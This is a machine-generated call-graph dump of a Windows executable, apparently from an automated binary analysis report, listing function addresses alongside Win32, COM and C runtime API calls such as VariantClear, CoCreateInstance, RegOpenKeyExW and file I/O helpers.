VariantCopy 87379->87434 87381 47973a VariantClear 87381->87341 87382->87331 87383->87334 87384->87339 87385->87355 87386->87355 87387->87358 87388->87358 87389->87324 87391 410167 _wcslen 87390->87391 87392 4115d7 52 API calls 87391->87392 87393 41017e _wcscpy 87392->87393 87393->87364 87394->87370 87396 47952a 87395->87396 87414 47955c 87395->87414 87397 479597 87396->87397 87398 4795c6 87396->87398 87399 479602 87396->87399 87400 4795b0 87396->87400 87402 479531 87396->87402 87403 479571 87396->87403 87404 479669 87396->87404 87407 479698 87396->87407 87409 4796b4 87396->87409 87410 4795e3 87396->87410 87413 479628 87396->87413 87396->87414 87448 443006 57 API calls 87397->87448 87408 45340c 85 API calls 87398->87408 87411 47960d VariantCopy 87399->87411 87399->87414 87449 44b3ac 57 API calls 87400->87449 87401 408f40 VariantClear 87412 4796d9 87401->87412 87418 408f40 VariantClear 87402->87418 87419 408f40 VariantClear 87403->87419 87404->87407 87420 479676 87404->87420 87435 473b76 87407->87435 87415 4795d7 SysAllocString 87408->87415 87452 44ce43 VariantClear SafeArrayCreateVector _memmove 87409->87452 87450 479362 109 API calls 87410->87450 87416 408f40 VariantClear 87411->87416 87412->87379 87427 479500 105 API calls 87413->87427 87414->87401 87415->87414 87417 47961d 87416->87417 87417->87379 87424 479551 87418->87424 87425 47958c 87419->87425 87426 408f40 VariantClear 87420->87426 87424->87379 87425->87379 87428 47968d 87426->87428 87429 479644 87427->87429 87428->87379 87451 437063 VariantClear VariantCopy 87429->87451 87431 47964b VariantClear 87432 408f40 VariantClear 87431->87432 87433 47965e 87432->87433 87433->87379 87434->87381 87453 443106 87435->87453 87437 473b88 SafeArrayCreateVector 87438 473be0 87437->87438 87441 473b99 87437->87441 87439 408f40 VariantClear 87438->87439 87440 473be8 87439->87440 87440->87414 87454 4680ed 87441->87454 87443 473bb8 _memmove 87444 408f40 VariantClear 87443->87444 87445 473bcc 87444->87445 87446 408f40 VariantClear 87445->87446 87447 473bd4 87446->87447 87447->87414 87448->87414 87449->87414 87450->87414 87451->87431 87452->87414 87453->87437 87455 468100 87454->87455 87456 4680fa 87454->87456 87455->87443 87457 467ac4 55 API calls 87456->87457 87457->87455 87459 4289d2 87458->87459 87460 408db3 87458->87460 87491 45e737 90 API calls 3 library calls 87459->87491 87487 40bec0 87460->87487 87463 4289e5 87492 45e737 90 API calls 3 library calls 87463->87492 87464 408e5a 87464->87125 87466 40ba10 52 API calls 87469 408dc9 87466->87469 87467 428a05 87468 408f40 VariantClear 87467->87468 87468->87464 87469->87463 87469->87464 87469->87466 87469->87467 87470 40a780 197 API calls 87469->87470 87471 408e64 87469->87471 87473 408f40 VariantClear 87469->87473 87470->87469 87472 408f40 VariantClear 87471->87472 87472->87464 87473->87469 87475 408f40 VariantClear 87474->87475 87476 403d20 87475->87476 87477 403cd0 VariantClear 87476->87477 87478 403d4d 87477->87478 87480 4013c0 52 API calls 87478->87480 87494 477145 87478->87494 87499 4755ad 87478->87499 87502 46adb6 87478->87502 87507 46f8cb 87478->87507 87479 403d76 87479->87122 87479->87133 87480->87479 87485->87122 87486->87124 87489 40bed0 87487->87489 87488 40bef2 87488->87469 87489->87488 87493 45e737 90 API calls 3 library calls 87489->87493 87491->87463 87492->87467 87493->87488 87495 408e80 VariantClear 87494->87495 87496 47715a 87495->87496 87526 467ac4 87496->87526 87498 477160 87498->87479 87549 475077 87499->87549 87501 4755c0 87501->87479 87503 4680ed 55 API calls 87502->87503 87504 46adcb 87503->87504 87661 453132 53 API calls __setmbcp_nolock 87504->87661 87506 46ae24 _memmove 87506->87479 87508 46f8e7 87507->87508 87509 46f978 87507->87509 87510 46f900 87508->87510 87511 46f93c 87508->87511 87512 46f91a 87508->87512 87518 46f8ee 87508->87518 87509->87479 87514 45340c 85 API calls 87510->87514 87513 45340c 85 API calls 87511->87513 87515 45340c 85 API calls 87512->87515 87516 46f958 87513->87516 87514->87518 87519 46f931 87515->87519 87520 45340c 85 API calls 87516->87520 87517 45340c 85 API calls 87521 46f971 87517->87521 87518->87517 87522 45340c 85 API calls 87519->87522 87523 46f95f 87520->87523 87662 46cb5f 87521->87662 87522->87518 87525 45340c 85 API calls 87523->87525 87525->87518 87527 467adc 87526->87527 87537 467bb8 87526->87537 87528 467c1d 87527->87528 87529 467c16 87527->87529 87530 467b90 87527->87530 87539 467aed 87527->87539 87531 4115d7 52 API calls 87528->87531 87548 40e270 VariantClear moneypunct 87529->87548 87533 4115d7 52 API calls 87530->87533 87545 467b75 _memmove 87531->87545 87533->87545 87534 467b55 87536 4115d7 52 API calls 87534->87536 87535 4115d7 52 API calls 87535->87537 87538 467b5b 87536->87538 87537->87498 87546 442ee0 52 API calls 87538->87546 87541 4115d7 52 API calls 87539->87541 87544 467b28 moneypunct 87539->87544 87541->87544 87542 467b6b 87547 45f645 54 API calls moneypunct 87542->87547 87544->87528 87544->87534 87544->87545 87545->87535 87546->87542 87547->87545 87548->87528 87600 4533eb 87549->87600 87552 4750ee 87554 408f40 VariantClear 87552->87554 87553 475129 87604 4646e0 87553->87604 87560 4750f5 87554->87560 87556 47515e 87557 475162 87556->87557 87590 47518e 87556->87590 87559 408f40 VariantClear 87557->87559 87558 475357 87561 475365 87558->87561 87562 4754ea 87558->87562 87573 475169 87559->87573 87560->87501 87638 44b3ac 57 API calls 87561->87638 87644 464812 91 API calls 87562->87644 87566 475374 87617 430d31 87566->87617 87567 4754fc 87567->87566 87569 475508 87567->87569 87568 4533eb 85 API calls 87568->87590 87570 408f40 VariantClear 87569->87570 87572 47550f 87570->87572 87572->87573 87573->87501 87574 475388 87624 4577e9 87574->87624 87577 47539e 87632 410cfc 87577->87632 87578 475480 87580 408f40 VariantClear 87578->87580 87580->87573 87582 4753d4 87640 40e830 53 API calls 87582->87640 87583 4753b8 87639 45e737 90 API calls 3 library calls 87583->87639 87586 4753c5 GetCurrentProcess TerminateProcess 87586->87582 87587 4753e3 87598 475406 87587->87598 87641 40cf00 53 API calls 87587->87641 87588 4754b5 87589 408f40 VariantClear 87588->87589 87589->87573 87590->87558 87590->87568 87590->87578 87590->87588 87636 436299 52 API calls 2 library calls 87590->87636 87637 463ad5 64 API calls __wcsicoll 87590->87637 87592 4753f8 87642 46c43e 106 API calls 2 library calls 87592->87642 87597 408e80 VariantClear 87597->87598 87598->87573 87598->87597 87599 408f40 VariantClear 87598->87599 87643 40cf00 53 API calls 87598->87643 87645 44b3ac 57 API calls 87598->87645 87646 46c43e 106 API calls 2 library calls 87598->87646 87599->87598 87601 453404 87600->87601 87602 4533f8 87600->87602 87601->87552 87601->87553 87602->87601 87647 4531b1 85 API calls 5 library calls 87602->87647 87648 4536f7 53 API calls 87604->87648 87606 4646fc 87649 4426cd 59 API calls _wcslen 87606->87649 87608 464711 87610 40bc70 52 API calls 87608->87610 87616 46474b 87608->87616 87611 46472c 87610->87611 87650 461465 52 API calls _memmove 87611->87650 87613 464741 87615 40c600 52 API calls 87613->87615 87614 464793 87614->87556 87615->87616 87616->87614 87651 463ad5 64 API calls __wcsicoll 87616->87651 87618 430db2 87617->87618 87619 430d54 87617->87619 87618->87574 87620 4115d7 52 API calls 87619->87620 87621 430d74 87620->87621 87622 430da9 87621->87622 87623 4115d7 52 API calls 87621->87623 87622->87574 87623->87621 87625 457a84 87624->87625 87631 45780c _strcat moneypunct _wcslen _wcscpy 87624->87631 87625->87577 87626 45340c 85 API calls 87626->87631 87627 443006 57 API calls 87627->87631 87629 4135bb 46 API calls _malloc 87629->87631 87631->87625 87631->87626 87631->87627 87631->87629 87652 40f6f0 87631->87652 87660 44b3ac 57 API calls 87631->87660 87633 410d11 87632->87633 87634 410da9 VirtualProtect 87633->87634 87635 410d77 87633->87635 87634->87635 87635->87582 87635->87583 87636->87590 87637->87590 87638->87566 87639->87586 87640->87587 87641->87592 87642->87598 87643->87598 87644->87567 87645->87598 87646->87598 87647->87601 87648->87606 87649->87608 87650->87613 87651->87614 87653 425de2 87652->87653 87657 40f6fc _wcslen 87652->87657 87653->87631 87654 40f710 WideCharToMultiByte 87655 40f756 87654->87655 87656 40f728 87654->87656 87655->87631 87658 4115d7 52 API calls 87656->87658 87657->87654 87659 40f735 WideCharToMultiByte 87658->87659 87659->87631 87660->87631 87661->87506 87663 40bc70 52 API calls 87662->87663 87664 46cb7e 87663->87664 87665 40bc70 52 API calls 87664->87665 87666 46cb86 87665->87666 87667 40bc70 52 API calls 87666->87667 87668 46cb91 87667->87668 87669 408f40 VariantClear 87668->87669 87670 46cbaf 87669->87670 87671 46cbd4 CLSIDFromProgID 87670->87671 87672 46cbc5 OleInitialize 87670->87672 87673 46cc33 87671->87673 87674 46cbe9 CLSIDFromString 87671->87674 87672->87671 87675 46cca6 87673->87675 87676 46cc49 CoCreateInstance 87673->87676 87674->87673 87677 46cbfb 87674->87677 87707 458651 59 API calls __setmbcp_nolock 87675->87707 87676->87677 87683 46cc62 87676->87683 87706 451b42 61 API calls 87677->87706 87680 46ccb3 87680->87677 87681 46ccbc CoInitializeSecurity 87680->87681 87682 46ccdf __setmbcp_nolock 87681->87682 87708 4311fc CoTaskMemAlloc _wcslen _wcscpy 87682->87708 87683->87677 87686 46ceb7 87683->87686 87685 46ccf2 87687 46cd86 _wcslen __setmbcp_nolock 87685->87687 87689 402160 52 API calls 87685->87689 87711 468070 104 API calls moneypunct 87686->87711 87691 46ce09 CoCreateInstanceEx CoTaskMemFree 87687->87691 87694 46cd21 87687->87694 87688 46cc0b 87688->87509 87693 46cd0c 87689->87693 87691->87677 87692 46ce50 87691->87692 87692->87677 87696 46ce64 CoSetProxyBlanket 87692->87696 87697 46ce8d 87692->87697 87693->87694 87709 465177 52 API calls 87693->87709 87694->87687 87696->87697 87697->87683 87699 46cea4 87697->87699 87698 46cd46 87700 40e0a0 52 API calls 87698->87700 87699->87677 87701 46cd4f 87700->87701 87710 46150f 52 API calls 87701->87710 87702 46cec2 87702->87509 87704 46cd7a 87705 40e0a0 52 API calls 87704->87705 87705->87687 87706->87688 87707->87680 87708->87685 87709->87698 87710->87704 87711->87702 87712->87141 87713->86911 87714->86911 87715->86911 87716->86911 87717->86911 87718->86918 87719->86918 87720->86938 87721->86924 87722->86960 87723->86960 87724->86960 87725->86956 87726->86960 87727->86960 87728->86981 87729->86983 87730 425b2b 87735 40f000 87730->87735 87734 425b3a 87736 4115d7 52 API calls 87735->87736 87737 40f007 87736->87737 87738 4276ea 87737->87738 87744 40f030 87737->87744 87743 41130a 51 API calls __cinit 87743->87734 87745 40f039 87744->87745 87746 40f01a 87744->87746 87774 41130a 51 API calls __cinit 87745->87774 87748 40e500 87746->87748 87749 40bc70 52 API calls 87748->87749 87750 40e515 GetVersionExW 87749->87750 87751 402160 52 API calls 87750->87751 87752 40e557 87751->87752 87775 40e660 87752->87775 87759 427674 87761 4276c6 GetSystemInfo 87759->87761 87760 40e5cd GetCurrentProcess 87796 40ef20 LoadLibraryA GetProcAddress 87760->87796 87763 4276d5 GetSystemInfo 87761->87763 87766 40e5e0 87766->87763 87789 40efd0 87766->87789 87767 40e629 87793 40ef90 87767->87793 87770 40e641 FreeLibrary 87771 40e644 87770->87771 87772 40e653 FreeLibrary 87771->87772 87773 40e656 87771->87773 87772->87773 87773->87743 87774->87746 87776 40e667 87775->87776 87777 42761d 87776->87777 87778 40c600 52 API calls 87776->87778 87779 40e55c 87778->87779 87780 40e680 87779->87780 87781 40e687 87780->87781 87782 427616 87781->87782 87783 40c600 52 API calls 87781->87783 87784 40e566 87783->87784 87784->87759 87785 40ef60 87784->87785 87786 40e5c8 87785->87786 87787 40ef66 LoadLibraryA 87785->87787 87786->87760 87786->87766 87787->87786 87788 40ef77 GetProcAddress 87787->87788 87788->87786 87790 40e620 87789->87790 87791 40efd6 LoadLibraryA 87789->87791 87790->87761 87790->87767 87791->87790 87792 40efe7 GetProcAddress 87791->87792 87792->87790 87797 40efb0 LoadLibraryA GetProcAddress 87793->87797 87795 40e632 GetNativeSystemInfo 87795->87770 87795->87771 87796->87766 87797->87795 87798 425b6f 87803 40dc90 87798->87803 87802 425b7e 87804 40bc70 52 API calls 87803->87804 87805 40dd03 87804->87805 87811 40f210 87805->87811 87807 40dd96 87809 40ddb7 87807->87809 87814 40dc00 52 API calls 2 library calls 87807->87814 87810 41130a 51 API calls __cinit 87809->87810 87810->87802 87815 40f250 RegOpenKeyExW 87811->87815 87813 40f230 87813->87807 87814->87807 87816 425e17 87815->87816 87817 40f275 RegQueryValueExW 87815->87817 87816->87813 87818 40f2c3 RegCloseKey 87817->87818 87819 40f298 87817->87819 87818->87813 87820 40f2a9 RegCloseKey 87819->87820 87821 425e1d 87819->87821 87820->87813 87822 40b374 87823 40b328 87822->87823 87826 40f430 87823->87826 87825 40b333 87827 40f444 87826->87827 87833 40cc70 87827->87833 87829 40f462 87830 40f46b 87829->87830 87842 40c790 VariantClear moneypunct 87829->87842 87830->87825 87832 40f487 87832->87825 87834 40a780 197 API calls 87833->87834 87835 40cc96 87834->87835 87836 42bd0e 87835->87836 87837 40cc9e 87835->87837 87838 408f40 VariantClear 87836->87838 87840 408f40 VariantClear 87837->87840 87839 42bd16 87838->87839 87839->87829 87841 40ccb8 87840->87841 87841->87829 87842->87832 87843 416454 87880 416c70 87843->87880 87845 416460 GetStartupInfoW 87846 416474 87845->87846 87881 419d5a HeapCreate 87846->87881 87848 4164cd 87849 4164d8 87848->87849 87964 41642b 46 API calls 3 library calls 87848->87964 87882 417c20 GetModuleHandleW 87849->87882 87852 4164de 87853 4164e9 __RTC_Initialize 87852->87853 87965 41642b 46 API calls 3 library calls 87852->87965 87901 41aaa1 GetStartupInfoW 87853->87901 87857 416503 GetCommandLineW 87914 41f584 GetEnvironmentStringsW 87857->87914 87861 416513 87920 41f4d6 GetModuleFileNameW 87861->87920 87863 41651d 87864 416528 87863->87864 87967 411924 46 API calls 3 library calls 87863->87967 87924 41f2a4 87864->87924 87867 41652e 87868 416539 87867->87868 87968 411924 46 API calls 3 library calls 87867->87968 87938 411703 87868->87938 87871 416541 87873 41654c __wwincmdln 87871->87873 87969 411924 46 API calls 3 library calls 87871->87969 87942 40d6b0 87873->87942 87880->87845 87881->87848 87883 417c34 87882->87883 87884 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 87882->87884 87972 4178ff 49 API calls _free 87883->87972 87886 417c87 TlsAlloc 87884->87886 87889 417cd5 TlsSetValue 87886->87889 87890 417d96 87886->87890 87887 417c39 87887->87852 87889->87890 87891 417ce6 __init_pointers 87889->87891 87890->87852 87973 418151 InitializeCriticalSectionAndSpinCount 87891->87973 87893 417d91 87981 4178ff 49 API calls _free 87893->87981 87895 417d2a 87895->87893 87974 416b49 87895->87974 87898 417d76 87980 41793c 46 API calls 4 library calls 87898->87980 87900 417d7e GetCurrentThreadId 87900->87890 87902 416b49 __calloc_crt 46 API calls 87901->87902 87911 41aabf 87902->87911 87903 41ac6a GetStdHandle 87908 41ac34 87903->87908 87904 416b49 __calloc_crt 46 API calls 87904->87911 87905 41acce SetHandleCount 87913 4164f7 87905->87913 87906 41ac7c GetFileType 87906->87908 87907 41abb4 87907->87908 87909 41abe0 GetFileType 87907->87909 87910 41abeb InitializeCriticalSectionAndSpinCount 87907->87910 87908->87903 87908->87905 87908->87906 87912 41aca2 InitializeCriticalSectionAndSpinCount 87908->87912 87909->87907 87909->87910 87910->87907 87910->87913 87911->87904 87911->87907 87911->87908 87911->87913 87912->87908 87912->87913 87913->87857 87966 411924 46 API calls 3 library calls 87913->87966 87915 41f595 87914->87915 87916 41f599 87914->87916 87915->87861 87991 416b04 87916->87991 87918 41f5bb _memmove 87919 41f5c2 FreeEnvironmentStringsW 87918->87919 87919->87861 87921 41f50b _wparse_cmdline 87920->87921 87922 416b04 __malloc_crt 46 API calls 87921->87922 87923 41f54e _wparse_cmdline 87921->87923 87922->87923 87923->87863 87925 41f2bc _wcslen 87924->87925 87929 41f2b4 87924->87929 87926 416b49 __calloc_crt 46 API calls 87925->87926 87931 41f2e0 _wcslen 87926->87931 87927 41f336 87998 413748 87927->87998 87929->87867 87930 416b49 __calloc_crt 46 API calls 87930->87931 87931->87927 87931->87929 87931->87930 87932 41f35c 87931->87932 87935 41f373 87931->87935 87997 41ef12 46 API calls __write_nolock 87931->87997 87933 413748 _free 46 API calls 87932->87933 87933->87929 88004 417ed3 87935->88004 87937 41f37f 87937->87867 87939 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 87938->87939 87941 411750 __IsNonwritableInCurrentImage 87939->87941 88023 41130a 51 API calls __cinit 87939->88023 87941->87871 87943 42e2f3 87942->87943 87944 40d6cc 87942->87944 87945 408f40 VariantClear 87944->87945 87946 40d707 87945->87946 88024 40ebb0 87946->88024 87949 40d737 88027 411951 87949->88027 87954 40d751 88039 40f4e0 SystemParametersInfoW SystemParametersInfoW 87954->88039 87956 40d75f 88040 40d590 GetCurrentDirectoryW 87956->88040 87964->87849 87965->87853 87972->87887 87973->87895 87976 416b52 87974->87976 87977 416b8f 87976->87977 87978 416b70 Sleep 87976->87978 87982 41f677 87976->87982 87977->87893 87977->87898 87979 416b85 87978->87979 87979->87976 87979->87977 87980->87900 87981->87890 87983 41f683 87982->87983 87989 41f69e _malloc 87982->87989 87984 41f68f 87983->87984 87983->87989 87990 417f77 46 API calls __getptd_noexit 87984->87990 87986 41f6b1 HeapAlloc 87988 41f6d8 87986->87988 87986->87989 87987 41f694 87987->87976 87988->87976 87989->87986 87989->87988 87990->87987 87994 416b0d 87991->87994 87992 4135bb _malloc 45 API calls 87992->87994 87993 416b43 87993->87918 87994->87992 87994->87993 87995 416b24 Sleep 87994->87995 87996 416b39 87995->87996 87996->87993 87996->87994 87997->87931 87999 41377c _free 87998->87999 88000 413753 RtlFreeHeap 87998->88000 87999->87929 88000->87999 88001 413768 88000->88001 88007 417f77 46 API calls __getptd_noexit 88001->88007 88003 41376e GetLastError 88003->87999 88008 417daa 88004->88008 88007->88003 88009 417dc9 __setmbcp_nolock __call_reportfault 88008->88009 88010 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 88009->88010 88011 417eb5 __call_reportfault 88010->88011 88014 41a208 88011->88014 88013 417ed1 GetCurrentProcess TerminateProcess 88013->87937 88015 41a210 88014->88015 88016 41a212 IsDebuggerPresent 88014->88016 88015->88013 88022 41fe19 88016->88022 88019 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 88020 421ff8 GetCurrentProcess TerminateProcess 88019->88020 88021 421ff0 __call_reportfault 88019->88021 88020->88013 88021->88020 88022->88019 88023->87941 88080 40ebd0 88024->88080 88084 4182cb 88027->88084 88029 41195e 88091 4181f2 LeaveCriticalSection 88029->88091 88031 40d748 88032 4119b0 88031->88032 88033 4119d6 88032->88033 88034 4119bc 88032->88034 88033->87954 88034->88033 88126 417f77 46 API calls __getptd_noexit 88034->88126 88036 4119c6 88127 417f25 10 API calls __write_nolock 88036->88127 88038 4119d1 88038->87954 88039->87956 88128 401f20 88040->88128 88079 40ec00 LoadLibraryA GetProcAddress 88079->87949 88081 40d72e 88080->88081 88082 40ebd6 LoadLibraryA 88080->88082 88081->87949 88081->88079 88082->88081 88083 40ebe7 GetProcAddress 88082->88083 88083->88081 88085 4182e0 88084->88085 88086 4182f3 EnterCriticalSection 88084->88086 88092 418209 88085->88092 88086->88029 88088 4182e6 88088->88086 88119 411924 46 API calls 3 library calls 88088->88119 88091->88031 88093 418215 __lseeki64 88092->88093 88094 418225 88093->88094 88095 41823d 88093->88095 88120 418901 46 API calls 2 library calls 88094->88120 88097 416b04 __malloc_crt 45 API calls 88095->88097 88103 41824b __lseeki64 88095->88103 88099 418256 88097->88099 88098 41822a 88121 418752 46 API calls 9 library calls 88098->88121 88101 41825d 88099->88101 88102 41826c 88099->88102 88123 417f77 46 API calls __getptd_noexit 88101->88123 88107 4182cb __lock 45 API calls 88102->88107 88103->88088 88104 418231 88122 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 88104->88122 88109 418273 88107->88109 88110 4182a6 88109->88110 88111 41827b InitializeCriticalSectionAndSpinCount 88109->88111 88112 413748 _free 45 API calls 88110->88112 88113 418297 88111->88113 88114 41828b 88111->88114 88112->88113 88125 4182c2 LeaveCriticalSection _doexit 88113->88125 88115 413748 _free 45 API calls 88114->88115 88116 418291 88115->88116 88124 417f77 46 API calls __getptd_noexit 88116->88124 88120->88098 88121->88104 88123->88103 88124->88113 88125->88103 88126->88036 88127->88038 88238 40e6e0 88128->88238 88132 401f41 GetModuleFileNameW 88256 410100 88132->88256 88134 401f5c 88268 410960 88134->88268 88137 401b10 52 API calls 88138 401f81 88137->88138 88139 401980 53 API calls 88138->88139 88140 401f8e 88139->88140 88141 408f40 VariantClear 88140->88141 88142 401f9d 88141->88142 88143 401b10 52 API calls 88142->88143 88144 401fb4 88143->88144 88145 401980 53 API calls 88144->88145 88146 401fc3 88145->88146 88147 401b10 52 API calls 88146->88147 88148 401fd2 88147->88148 88149 40c2c0 52 API calls 88148->88149 88150 401fe1 88149->88150 88151 40bc70 52 API calls 88150->88151 88152 401ff3 88151->88152 88271 401a10 88152->88271 88154 401ffe 88278 4114ab 88154->88278 88239 40bc70 52 API calls 88238->88239 88240 401f31 88239->88240 88241 402560 88240->88241 88242 40256d __write_nolock 88241->88242 88243 402160 52 API calls 88242->88243 88245 402593 88243->88245 88249 4025bd 88245->88249 88290 401c90 88245->88290 88246 4026f0 52 API calls 88246->88249 88247 4026db 88247->88132 88248 4026a7 88248->88247 88250 401b10 52 API calls 88248->88250 88249->88246 88249->88248 88251 401b10 52 API calls 88249->88251 88255 401c90 52 API calls 88249->88255 88293 40d7c0 52 API calls 2 library calls 88249->88293 88252 4026d1 88250->88252 88251->88249 88294 40d7c0 52 API calls 2 library calls 88252->88294 88255->88249 88295 40f760 88256->88295 88259 410118 88259->88134 88261 42805d 88262 42806a 88261->88262 88351 431e58 88261->88351 88264 413748 _free 46 API calls 88262->88264 88265 428078 88264->88265 88266 431e58 82 API calls 88265->88266 88267 428084 88266->88267 88267->88134 88269 4115d7 52 API calls 88268->88269 88270 401f74 88269->88270 88270->88137 88272 401a30 88271->88272 88273 401a17 88271->88273 88275 402160 52 API calls 88272->88275 88274 401a2d 88273->88274 88966 403c30 52 API calls _memmove 88273->88966 88274->88154 88277 401a3d 88275->88277 88277->88154 88279 411523 88278->88279 88280 4114ba 88278->88280 88969 4113a8 58 API calls 3 library calls 88279->88969 88285 40200c 88280->88285 88967 417f77 46 API calls __getptd_noexit 88280->88967 88283 4114c6 88291 4026f0 52 API calls 88290->88291 88292 401c97 88291->88292 88292->88245 88293->88249 88294->88247 88296 40f6f0 54 API calls 88295->88296 88297 40f77b _strcat moneypunct 88296->88297 88355 40f850 88297->88355 88302 427c2a 88385 414d04 88302->88385 88304 40f7fc 88304->88302 88306 40f804 88304->88306 88372 414a46 88306->88372 88309 40f80e 88309->88259 88314 4528bd 88309->88314 88311 427c59 88391 414fe2 88311->88391 88313 427c79 88315 4150d1 _fseek 81 API calls 88314->88315 88316 452930 88315->88316 88891 452719 88316->88891 88319 452948 88319->88261 88320 414d04 __fread_nolock 61 API calls 88321 452966 88320->88321 88322 414d04 __fread_nolock 61 API calls 88321->88322 88323 452976 88322->88323 88324 414d04 __fread_nolock 61 API calls 88323->88324 88325 45298f 88324->88325 88326 414d04 __fread_nolock 61 API calls 88325->88326 88327 4529aa 88326->88327 88328 4150d1 _fseek 81 API calls 88327->88328 88329 4529c4 88328->88329 88330 4135bb _malloc 46 API calls 88329->88330 88331 4529cf 88330->88331 88332 4135bb _malloc 46 API calls 88331->88332 88333 4529db 88332->88333 88334 414d04 __fread_nolock 61 API calls 88333->88334 88335 4529ec 88334->88335 88336 44afef GetSystemTimeAsFileTime 88335->88336 88337 452a00 88336->88337 88338 452a36 88337->88338 88339 452a13 88337->88339 88341 452aa5 88338->88341 88342 452a3c 88338->88342 88340 413748 _free 46 API calls 88339->88340 88344 452a1c 88340->88344 88343 413748 _free 46 API calls 88341->88343 88897 44b1a9 88342->88897 88347 452aa3 88343->88347 88348 413748 _free 46 API calls 88344->88348 88347->88261 88352 431e64 88351->88352 88353 431e6a 88351->88353 88354 414a46 __fcloseall 82 API calls 88352->88354 88353->88262 88354->88353 88357 40f85d __setmbcp_nolock _strlen 88355->88357 88356 426b3b 88357->88356 88359 40f7ab 88357->88359 88404 414db8 88357->88404 88360 4149c2 88359->88360 88419 414904 88360->88419 88362 40f7e9 88362->88302 88363 40f5c0 88362->88363 88368 40f5cd _strcat __write_nolock _memmove 88363->88368 88364 414d04 __fread_nolock 61 API calls 88364->88368 88366 425d11 88367 4150d1 _fseek 81 API calls 88366->88367 88369 425d33 88367->88369 88368->88364 88368->88366 88371 40f691 __tzset_nolock 88368->88371 88507 4150d1 88368->88507 88370 414d04 __fread_nolock 61 API calls 88369->88370 88370->88371 88371->88304 88373 414a52 __lseeki64 88372->88373 88374 414a64 88373->88374 88375 414a79 88373->88375 88647 417f77 46 API calls __getptd_noexit 88374->88647 88377 415471 __lock_file 47 API calls 88375->88377 88383 414a74 __lseeki64 88375->88383 88379 414a92 88377->88379 88378 414a69 88648 417f25 10 API calls __write_nolock 88378->88648 88631 4149d9 88379->88631 88383->88309 88716 414c76 88385->88716 88387 414d1c 88388 44afef 88387->88388 88884 442c5a 88388->88884 88390 44b00d 88390->88311 88392 414fee __lseeki64 88391->88392 88393 414ffa 88392->88393 88394 41500f 88392->88394 88888 417f77 46 API calls __getptd_noexit 88393->88888 88395 415471 __lock_file 47 API calls 88394->88395 88397 415017 88395->88397 88399 414e4e __ftell_nolock 51 API calls 88397->88399 88398 414fff 88889 417f25 10 API calls __write_nolock 88398->88889 88401 415024 88399->88401 88890 41503d LeaveCriticalSection LeaveCriticalSection _fseek 88401->88890 88403 41500a __lseeki64 88403->88313 88405 414dd6 88404->88405 88406 414deb 88404->88406 88415 417f77 46 API calls __getptd_noexit 88405->88415 88406->88405 88408 414df2 88406->88408 88417 41b91b 79 API calls 10 library calls 88408->88417 88409 414ddb 88416 417f25 10 API calls __write_nolock 88409->88416 88412 414e18 88413 414de6 88412->88413 88418 418f98 77 API calls 5 library calls 88412->88418 88413->88357 88415->88409 88416->88413 88417->88412 88418->88413 88421 414910 __lseeki64 88419->88421 88420 414923 88475 417f77 46 API calls __getptd_noexit 88420->88475 88421->88420 88423 414951 88421->88423 88438 41d4d1 88423->88438 88424 414928 88476 417f25 10 API calls __write_nolock 88424->88476 88427 414956 88428 41496a 88427->88428 88429 41495d 88427->88429 88431 414992 88428->88431 88432 414972 88428->88432 88477 417f77 46 API calls __getptd_noexit 88429->88477 88455 41d218 88431->88455 88478 417f77 46 API calls __getptd_noexit 88432->88478 88433 414933 __lseeki64 @_EH4_CallFilterFunc@8 88433->88362 88439 41d4dd __lseeki64 88438->88439 88440 4182cb __lock 46 API calls 88439->88440 88453 41d4eb 88440->88453 88441 41d560 88480 41d5fb 88441->88480 88442 41d567 88443 416b04 __malloc_crt 46 API calls 88442->88443 88446 41d56e 88443->88446 88445 41d5f0 __lseeki64 88445->88427 88446->88441 88447 41d57c InitializeCriticalSectionAndSpinCount 88446->88447 88448 41d59c 88447->88448 88449 41d5af EnterCriticalSection 88447->88449 88452 413748 _free 46 API calls 88448->88452 88449->88441 88450 418209 __mtinitlocknum 46 API calls 88450->88453 88452->88441 88453->88441 88453->88442 88453->88450 88483 4154b2 47 API calls __lock 88453->88483 88484 415520 LeaveCriticalSection LeaveCriticalSection _doexit 88453->88484 88456 41d23a 88455->88456 88457 41d255 88456->88457 88467 41d26c __wopenfile 88456->88467 88489 417f77 46 API calls __getptd_noexit 88457->88489 88459 41d25a 88490 417f25 10 API calls __write_nolock 88459->88490 88461 41d47a 88494 417f77 46 API calls __getptd_noexit 88461->88494 88462 41d48c 88486 422bf9 88462->88486 88465 41499d 88479 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 88465->88479 88466 41d47f 88495 417f25 10 API calls __write_nolock 88466->88495 88467->88461 88474 41d421 88467->88474 88491 41341f 58 API calls 2 library calls 88467->88491 88470 41d41a 88470->88474 88492 41341f 58 API calls 2 library calls 88470->88492 88472 41d439 88472->88474 88493 41341f 58 API calls 2 library calls 88472->88493 88474->88461 88474->88462 88475->88424 88476->88433 88477->88433 88478->88433 88479->88433 88485 4181f2 LeaveCriticalSection 88480->88485 88482 41d602 88482->88445 88483->88453 88484->88453 88485->88482 88496 422b35 88486->88496 88488 422c14 88488->88465 88489->88459 88490->88465 88491->88470 88492->88472 88493->88474 88494->88466 88495->88465 88499 422b41 __lseeki64 88496->88499 88497 422b54 88498 417f77 __write_nolock 46 API calls 88497->88498 88500 422b59 88498->88500 88499->88497 88501 422b8a 88499->88501 88503 417f25 __write_nolock 10 API calls 88500->88503 88502 422400 __tsopen_nolock 109 API calls 88501->88502 88504 422ba4 88502->88504 88506 422b63 __lseeki64 88503->88506 88505 422bcb __wsopen_helper LeaveCriticalSection 88504->88505 88505->88506 88506->88488 88509 4150dd __lseeki64 88507->88509 88508 4150e9 88538 417f77 46 API calls __getptd_noexit 88508->88538 88509->88508 88510 41510f 88509->88510 88520 415471 88510->88520 88513 4150ee 88539 417f25 10 API calls __write_nolock 88513->88539 88519 4150f9 __lseeki64 88519->88368 88521 415483 88520->88521 88522 4154a5 EnterCriticalSection 88520->88522 88521->88522 88523 41548b 88521->88523 88524 415117 88522->88524 88525 4182cb __lock 46 API calls 88523->88525 88526 415047 88524->88526 88525->88524 88527 415067 88526->88527 88528 415057 88526->88528 88533 415079 88527->88533 88541 414e4e 88527->88541 88596 417f77 46 API calls __getptd_noexit 88528->88596 88532 41505c 88540 415143 LeaveCriticalSection LeaveCriticalSection 